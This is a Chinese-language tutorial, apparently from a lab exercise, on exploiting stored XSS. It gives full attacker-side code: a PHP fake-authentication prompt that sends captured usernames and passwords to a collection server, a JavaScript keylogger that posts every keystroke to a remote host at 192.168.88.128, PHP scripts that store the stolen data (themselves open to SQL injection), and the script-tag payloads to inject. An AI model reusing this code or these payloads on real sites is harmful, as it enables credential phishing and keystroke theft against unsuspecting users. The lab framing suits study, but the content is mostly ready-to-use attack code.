一、攻击方脚本代码
1. 钓鱼脚本
1.1.1 弹出伪造验证框脚本
<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
header('Content-type:text/html;charset=utf-8');
header("WWW-Authenticate: Basic realm='认证'");
header('HTTP/1.0 401 Unauthorized');
echo 'Authorization Required.';
exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
header("Location: http://192.168.88.128/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
&password={$_SERVER[PHP_AUTH_PW]}");
}
?>
1.1.2 将用户输入的信息进行处理并保存
<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
if(!empty($_GET['username']) && !empty($_GET['password'])){
$username=$_GET['username'];
$password=$_GET['password'];
$referer="";
$referer.=$_SERVER['HTTP_REFERER'];
$time=date('Y-m-d g:i:s');
$query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";
$result=mysqli_query($link, $query);
}
?>
2. 键盘记录脚本
1.2.1 制作键盘的js,异步发送给键盘记录脚本
function createAjax(){
var request=false;
if(window.XMLHttpRequest){
request=new XMLHttpRequest();
if(request.overrideMimeType){
request.overrideMimeType("text/xml");
}
}else if(window.ActiveXObject){
var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++){
try{
request=new ActiveXObject(versions[i]);
if(request){
return request;
}
}catch(e){
request=false;
}
}
}
return request;
}
var ajax=null;
var xl="datax=";
function onkeypress() {
var realkey = String.fromCharCode(event.keyCode);
xl+=realkey;
show();
}
document.onkeypress = onkeypress;
function show() {
ajax = createAjax();
ajax.onreadystatechange = function () {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
var data = ajax.responseText;
} else {
alert("页面请求失败");
}
}
}
var postdate = xl;
ajax.open("POST", "http://192.168.88.128/pkxss/rkeypress/rkserver.php",true);
ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
ajax.setRequestHeader("Content-length", postdate.length);
ajax.setRequestHeader("Connection", "close");
ajax.send(postdate);
}
1.2.2 将接受的按键记录处理并保存
<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();
//设置允许被跨域访问
header("Access-Control-Allow-Origin:*");
$data = $_POST['datax'];
$query = "insert keypress(data) values('$data')";
$result=mysqli_query($link,$query);
?>
二、利用存储型XSS漏洞构建Payload
直接链接攻击脚本/js,当用户进入被注入漏洞页面自动运行此脚本/js
2.1 钓鱼Payload:<script src="http://192.168.88.128/pkxss/xfish/fish.php"'></script>
2.2 键盘记录Payload:<script src="http://192.168.88.128/pkxss/rkeypress/rk.js"'></script>
三、被攻击方效果图
3.1 钓鱼效果图
3.2 键盘记录无显示效果
四、登陆攻击方后台查看